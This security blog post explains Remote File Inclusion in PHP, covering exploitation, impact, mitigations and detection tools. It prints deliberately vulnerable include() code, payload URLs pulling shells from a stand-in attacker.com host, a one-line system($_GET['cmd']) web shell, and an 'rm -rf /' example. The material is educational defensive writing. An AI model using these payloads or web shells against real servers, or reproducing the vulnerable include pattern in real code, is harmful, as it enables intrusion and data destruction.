Remote File Inclusion (RFI)
Remote File Inclusion (RFI) is a web security vulnerability that allows an attacker to include and execute a remote file on a web server by manipulating user input. Although RFI was historically a significant threat, it is less common today due to better secure coding practices and restrictions in modern web environments.
1. How Remote File Inclusion Works
RFI occurs when a web application dynamically includes files based on user input without proper validation or sanitization. This vulnerability allows attackers to include malicious files hosted on remote servers.
Vulnerable Code Example
<?php
$file = $_GET['file'];
include($file);
?>Input URL
http://example.com/index.php?file=http://attacker.com/malicious.phpWhat Happens
- The application fetches http://attacker.com/malicious.php.
- The included file executes as part of the server’s PHP script, potentially compromising the system.
2. Why RFI Is Less Common Today
1. Modern PHP Settings
- By default, modern versions of PHP disable the allow_url_include directive.
- This prevents inclusion of remote files via functions like include() or require().
- Example (disabled in php.ini)
allow_url_include = Off
2. Secure Coding Practices
- Increased awareness of input sanitization and validation has reduced RFI vulnerabilities.
3. Content Security Policy (CSP)
- Modern web applications enforce CSP headers, restricting the inclusion of untrusted scripts and resources.
4. Prevalence of Local File Inclusion (LFI)
- Attackers often exploit LFI, which is more common and easier to find.
3. Exploitation Techniques
a. File Inclusion
- Inject a remote file containing malicious code (e.g., a web shell).
- Example Payload
http://example.com/index.php?file=http://attacker.com/shell.php
b. Code Execution
Execute PHP code directly through a remotely included file.
Example
http://attacker.com/shell.php contains:
<?php system($_GET['cmd']); ?>Access via
http://example.com/index.php?file=http://attacker.com/shell.php&cmd=id
c. Information Gathering
- Attackers may include remote files to exfiltrate sensitive data.
4. Potential Impact of RFI
1. Code Execution
- Remote files containing PHP or server-side code can execute arbitrary commands.
- Example
<?php system('rm -rf /'); ?>
2. Data Exfiltration
- Steal sensitive data such as database credentials or user information.
3. Privilege Escalation
- Gain elevated privileges by injecting scripts that exploit local configurations.
4. Web Shell Deployment
- Install persistent backdoors for ongoing access.
5. Mitigation Techniques
1. Disable Remote File Inclusion
- Set allow_url_include to Off in php.ini
allow_url_include = Off
2. Sanitize and Validate Input
- Restrict user input to a predefined whitelist of acceptable files.
- Example (PHP)
$allowed_files = ['home.php', 'about.php', 'contact.php']; if (in_array($_GET['file'], $allowed_files)) { include($_GET['file']); } else { die("Access Denied"); }
3. Use Secure File Inclusion
- Always use static paths or resolve files locally.
- Example
include('pages/' . basename($_GET['file']));
4. Restrict File Permissions
- Limit access to sensitive files and directories on the server.
5. Content Security Policy (CSP)
- Enforce CSP headers to restrict external script and resource inclusion:
Content-Security-Policy: script-src 'self';
6. Web Application Firewalls (WAF)
- Use WAFs to block suspicious patterns indicative of RFI attacks (e.g., URLs in file parameters).
6. Tools for Detection
1. Burp Suite
- Test for RFI vulnerabilities by sending malicious file inclusion payloads.
2. OWASP ZAP
- Automated scanning for RFI in web applications.
3. Nikto
- A web server scanner that detects RFI vulnerabilities.
4. Manual Testing
- Use payloads like:
http://example.com/index.php?file=http://attacker.com/malicious.php
7. Real-World Example
Case Study: RFI in PHP Applications
An old PHP application dynamically included files based on user input.
An attacker injected
http://example.com/index.php?file=http://attacker.com/malicious.phpThe malicious file installed a web shell, allowing the attacker to execute arbitrary commands, upload additional scripts, and exfiltrate sensitive data.
8. Summary
| Aspect | Details |
|---|---|
| What is RFI? | Vulnerability allowing inclusion of remote files via user input. |
| Impact | Code execution, data theft, web shell installation, privilege escalation. |
| Why Less Common? | Modern PHP disables allow_url_include; better coding practices. |
| Prevention Techniques | Disable allow_url_include, validate input, enforce CSP, use WAF. |
| Tools for Detection | Burp Suite, OWASP ZAP, manual payload testing. |
While Remote File Inclusion (RFI) is less common today due to improved server and application configurations, it remains a critical vulnerability for legacy systems and poorly configured applications. By adopting secure coding practices, validating user input, and leveraging server-side restrictions, organizations can effectively mitigate the risks associated with RFI.
'Security Terms > Web Application' 카테고리의 다른 글
| Web Vulnerability Scanners (0) | 2025.01.23 |
|---|---|
| Server-Side Request Forgery (SSRF) (0) | 2025.01.23 |
| Local File Inclusion (LFI) (0) | 2025.01.23 |
| Browser Extension Takeovers (0) | 2025.01.23 |
| User Agent (0) | 2025.01.23 |